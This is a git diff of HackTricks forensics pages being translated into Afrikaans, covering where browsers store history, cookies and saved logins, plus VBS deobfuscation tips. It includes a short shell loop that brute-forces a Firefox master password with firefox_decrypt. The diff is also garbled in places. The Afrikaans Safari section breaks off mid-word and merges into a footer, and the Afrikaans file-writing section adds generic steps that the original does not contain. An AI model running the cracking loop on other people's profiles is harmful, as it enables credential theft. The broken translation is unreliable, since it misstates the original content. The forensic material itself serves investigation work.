* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
Here you can find interesting tricks for specific file-types and/or software:
Hier kan jy interessante truuks vir spesifieke lêertipes en/of sagteware vind:
{% page-ref page=".pyc.md" %}
@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

219
forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
View file

@ -1,80 +1,80 @@
# Browser Artifacts
# Blaaier Artefakte
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Browsers Artifacts <a href="#id-3def" id="id-3def"></a>
## Blaaier Artefakte <a href="#id-3def" id="id-3def"></a>
Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types.
Blaaier artefakte sluit verskillende soorte data in wat deur webblaaier gestoor word, soos navigasiegeskiedenis, bladmerke en kasdata. Hierdie artefakte word in spesifieke lêers binne die bedryfstelsel gehou, wat verskil in ligging en naam oor blaaier, maar oor die algemeen soortgelyke datatipes stoor.
Here's a summary of the most common browser artifacts:
Hier is 'n opsomming van die mees algemene blaaier artefakte:
- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites.
- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history.
- **Bookmarks**: Sites saved by the user for quick access.
- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user.
- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis.
- **Logins**: Stored login credentials.
- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits.
- **Browser Sessions**: Data related to open browser sessions.
- **Downloads**: Records of files downloaded through the browser.
- **Form Data**: Information entered in web forms, saved for future autofill suggestions.
- **Thumbnails**: Preview images of websites.
- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary.
- **Navigasiegeskiedenis**: Hou by watter webwerwe die gebruiker besoek het, nuttig om besoeke aan skadelike webwerwe te identifiseer.
- **Outomatiese voltooiingsdata**: Voorstelle gebaseer op gereelde soektogte, bied insigte wanneer dit gekombineer word met navigasiegeskiedenis.
- **Bladmerke**: Webwerwe wat deur die gebruiker gestoor is vir vinnige toegang.
- **Uitbreidings en Byvoegings**: Blaaieruitbreidings of byvoegings wat deur die gebruiker geïnstalleer is.
- **Kas**: Stoor webinhoud (bv. beelde, JavaScript-lêers) om webwerflaaitye te verbeter, waardevol vir forensiese analise.
- **Aantekeninge**: Gestoorde aanmeldingslegitimasie.
- **Favicons**: Ikone wat met webwerwe geassosieer word en in blaaierblaaie en bladmerke verskyn, nuttig vir addisionele inligting oor gebruikersbesoeke.
- **Blaaier-sessies**: Data wat verband hou met oop blaaier-sessies.
- **Aflaaiers**: Rekords van lêers wat deur die blaaier afgelaai is.
- **Vormdata**: Inligting wat in webvorms ingevoer is en gestoor word vir toekomstige outomatiese voltooiingsvoorstelle.
- **Duimnaels**: Voorskou-afbeeldings van webwerwe.
- **Custom Dictionary.txt**: Woorde wat deur die gebruiker by die blaaier se woordeboek gevoeg is.
## Firefox
Firefox organizes user data within profiles, stored in specific locations based on the operating system:
Firefox organiseer gebruikersdata binne profiele, wat in spesifieke liggings volgens die bedryfstelsel gestoor word:
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted.
'n `profiles.ini`-lêer binne hierdie gidslys die gebruikersprofiele. Elke profiel se data word in 'n vouer gestoor wat genoem word in die `Path`-veranderlike binne `profiles.ini`, wat in dieselfde gids as `profiles.ini` self geleë is. As 'n profiel se vouer ontbreek, is dit moontlik uitgevee.
Within each profile folder, you can find several important files:
Binne elke profielvouer kan jy verskeie belangrike lêers vind:
- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
- Use specific SQL queries to extract history and downloads information.
- **bookmarkbackups**: Contains backups of bookmarks.
- **formhistory.sqlite**: Stores web form data.
- **handlers.json**: Manages protocol handlers.
- **persdict.dat**: Custom dictionary words.
- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions.
- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows.
- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
- **favicons.sqlite**: Stores favicons.
- **prefs.js**: User settings and preferences.
- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite.
- **thumbnails**: Website thumbnails.
- **logins.json**: Encrypted login information.
- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information.
- **places.sqlite**: Stoor geskiedenis, bladmerke en aflaaie. Gereedskap soos [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) op Windows kan toegang verkry tot die geskiedenisdata.
- Gebruik spesifieke SQL-navrae om geskiedenis- en aflaaie-inligting te onttrek.
- **bookmarkbackups**: Bevat rugsteun van bladmerke.
- **formhistory.sqlite**: Stoor webvormdata.
- **handlers.json**: Bestuur protokolhanteraars.
- **persdict.dat**: Aangepaste woordeboekwoorde.
- **addons.json** en **extensions.sqlite**: Inligting oor geïnstalleerde byvoegings en uitbreidings.
- **cookies.sqlite**: Koekie-opberging, met [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) beskikbaar vir inspeksie op Windows.
- **cache2/entries** of **startupCache**: Kasdata, toeganklik deur gereedskap soos [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
- **favicons.sqlite**: Stoor favicons.
- **prefs.js**: Gebruikersinstellings en voorkeure.
- **downloads.sqlite**: Ouer aflaaie-databasis, nou geïntegreer in places.sqlite.
- **thumbnails**: Webwerf-duimnaels.
- **logins.json**: Versleutelde aanmeldingsinligting.
- **key4.db** of **key3.db**: Stoor versleutelingssleutels vir die beveiliging van sensitiewe inligting.
Additionally, checking the browsers anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled.
Daarbenewens kan die blaaier se anti-phishing-instellings nagegaan word deur te soek na `browser.safebrowsing`-inskrywings in `prefs.js`, wat aandui of veilige blaaierfunksies geaktiveer of gedeaktiveer is.
To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\
With the following script and call you can specify a password file to brute force:
Om te probeer om die meesterwagwoord te ontsluit, kan jy [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) gebruik.\
Met die volgende skripsie en oproep kan jy 'n wagwoordlêer spesifiseer om kragtig te krag:
{% code title="brute.sh" %}
```bash
@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1
while read pass; do
echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
done < $passfile
```
{% endcode %}
@ -93,113 +93,76 @@ done < $passfile
## Google Chrome
Google Chrome stores user profiles in specific locations based on the operating system:
Google Chrome stoor gebruikersprofielle in spesifieke liggings gebaseer op die bedryfstelsel:
- **Linux**: `~/.config/google-chrome/`
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data:
Binne hierdie gids, kan die meeste gebruikersdata gevind word in die **Default/** of **ChromeDefaultData/** gids. Die volgende lêers bevat belangrike data:
- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
- **Bookmarks**: User bookmarks.
- **Web Data**: Contains form history.
- **Favicons**: Stores website favicons.
- **Login Data**: Includes login credentials like usernames and passwords.
- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs.
- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed.
- **Extensions**: Directories for browser extensions and addons.
- **Thumbnails**: Stores website thumbnails.
- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more.
- **Browsers built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output.
- **Geskiedenis**: Bevat URL's, aflaaiers, en soek sleutelwoorde. Op Windows, kan [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) gebruik word om die geskiedenis te lees. Die "Transition Type" kolom het verskillende betekenisse, insluitend gebruiker klieke op skakels, getikte URL's, vorm indienings, en bladsy herlaaiings.
- **Koekies**: Stoor koekies. Vir inspeksie, is [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) beskikbaar.
- **Cache**: Hou gekasde data. Om te inspekteer, kan Windows gebruikers [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) gebruik.
- **Bladmerke**: Gebruiker bladmerke.
- **Web Data**: Bevat vorm geskiedenis.
- **Favicons**: Stoor webwerf favicons.
- **Login Data**: Sluit aanmeldingslegitimasie soos gebruikersname en wagwoorde in.
- **Huidige Sessie**/**Huidige Vlakke**: Data oor die huidige blaaier sessie en oop vlakke.
- **Laaste Sessie**/**Laaste Vlakke**: Inligting oor die webwerwe aktief gedurende die laaste sessie voor Chrome gesluit is.
- **Uitbreidings**: Gids vir blaaier uitbreidings en addons.
- **Duimnaels**: Stoor webwerf duimnaels.
- **Voorkeure**: 'n Lêer ryk aan inligting, insluitend instellings vir plugins, uitbreidings, pop-ups, kennisgewings, en meer.
- **Blaaier se ingeboude anti-phishing**: Om te kyk of anti-phishing en malware beskerming geaktiveer is, voer `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` uit. Kyk vir `{"enabled: true,"}` in die uitset.
## **SQLite DB Data Recovery**
## **SQLite DB Data Herwinning**
As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
Soos waargeneem kan word in die vorige afdelings, gebruik beide Chrome en Firefox **SQLite** databasisse om die data te stoor. Dit is moontlik om **verwyderde inskrywings te herwin met behulp van die instrumente** [**sqlparse**](https://github.com/padfoot999/sqlparse) **of** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
## **Internet Explorer 11**
Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management.
Internet Explorer 11 bestuur sy data en metadata oor verskillende liggings, wat help om gestoorde inligting en die ooreenstemmende besonderhede te skei vir maklike toegang en bestuur.
### Metadata Storage
Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype.
### Metadata Berging
Metadata vir Internet Explorer word gestoor in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (met VX wat V01, V16, of V24 kan wees). Tesame hiermee, kan die `V01.log` lêer wysigingstyd afwykings met `WebcacheVX.data` toon, wat dui op 'n behoefte vir herstel met behulp van `esentutl /r V01 /d`. Hierdie metadata, wat in 'n ESE databasis gehuisves word, kan herwin en ondersoek word met behulp van instrumente soos photorec en [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) onderskeidelik. Binne die **Containers** tabel, kan 'n mens die spesifieke tabelle of houers waar elke data segment gestoor word, onderskei, insluitend cache besonderhede vir ander Microsoft gereedskap soos Skype.
### Cache Inspection
The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times.
### Cache Inspeksie
Die [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) instrument maak dit moontlik om die cache te inspekteer, met die vereiste van die cache data onttrekkingsgids. Metadata vir die cache sluit lêernaam, gids, toegangstellings, URL oorsprong, en tydstempels wat cache skepping, toegang, wysiging, en verval tyd aandui.
### Cookies Management
Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory.
### Koekies Bestuur
Koekies kan ondersoek word met behulp van [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), met metadata wat name, URL's, toegangstellings, en verskeie tydverwante besonderhede insluit. Volgehoue koekies word gestoor in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, met sessie koekies wat in die geheue bly.
### Download Details
Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
### Aflaaibesonderhede
Aflaaibesonderhede is toeganklik via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), met spesifieke houers wat data soos URL, lêertipe, en aflaaigids bevat. Fisiese lêers kan gevind word onder `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
### Browsing History
To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
### Blaai Geskiedenis
Om blaai geskiedenis te hersien, kan [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) gebruik word, met die vereiste van die ligging van die uitgepakte geskiedenis lêers en konfigurasie vir Internet Explorer. Metadata hier sluit wysiging en toegangstye in, tesame met toegangstellings. Geskiedenis lêers is geleë in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
### Typed URLs
Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times.
### Getikte URL's
Getikte URL's en hul gebruikstye word binne die register gestoor onder `NTUSER.DAT` by `Software\Microsoft\InternetExplorer\TypedURLs` en `Software\Microsoft\InternetExplorer\TypedURLsTime`, wat die laaste 50 URL's wat deur die gebruiker ingevoer is en hul laaste inset tye volg.
## Microsoft Edge
Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are:
Microsoft Edge stoor gebruikersdata in `%userprofile%\Appdata\Local\Packages`. Die paaie vir verskillende datatipes is:
- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Profiel Pad**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **Geskiedenis, Koekies, en Aflaaibestande**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Instellings, Bladmerke, en Leeslys**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
- **Laaste Aktiewe Sessies**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
## Safari
Safari data is stored at `/Users/$User/Library/Safari`. Key files include:
Safari data word gestoor by `/Users/$User/Library/Safari`. Sleutellêers sluit in:
- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query.
- **Downloads.plist**: Information about downloaded files.
- **Bookmarks.plist**: Stores bookmarked URLs.
- **TopSites.plist**: Most frequently visited sites.
- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve.
- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse.
- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse.
- **Browsers built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active.
## Opera
Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads.
- **Browsers built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`.
These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers.
## References
* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- **History.db**: Bevat `history_visits` en `history_items` tabelle met URL's en besoek tydstempels. Gebruik `sqlite3` om navrae te doen.
- **Downloads.plist**: Inligting oor afgelaai lêers.
- **Bookmarks.plist**: Stoor gebl
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

92
forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
View file

@ -1,81 +1,87 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
Some things that could be useful to debug/deobfuscate a malicious VBS file:
Sommige dinge wat nuttig kan wees om 'n skadelike VBS-lêer te ontleed/deobfuskasie:
## echo
```bash
Wscript.Echo "Like this?"
```
## Commnets
## Kommentaar
```bash
' this is a comment
```
## Test
## Toets
```bash
cscript.exe file.vbs
```
## Skryf data na 'n lêer
## Write data to a file
Om data na 'n lêer te skryf, kan jy die volgende stappe volg:
1. Maak 'n nuwe lêer aan deur die lêer te skep met die gewenste naam en lêeruitbreiding. Byvoorbeeld, as jy 'n lêer met die naam "data.txt" wil skep, kan jy die volgende opdrag gebruik:
```bash
echo > data.txt
```
2. Open die lêer in 'n teksredigeerder of skryfprogram. Jy kan 'n teksredigeerder soos Notepad++ of Vim gebruik.
3. Skryf die data wat jy wil stoor in die lêer. Jy kan enige teks of binêre data in die lêer skryf. Byvoorbeeld:
```bash
echo "Dit is 'n voorbeeld van data wat in die lêer geskryf word." > data.txt
```
4. Stoor die veranderinge en sluit die lêer.
Nou sal die spesifiseerde data in die lêer gestoor word.
```js
Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
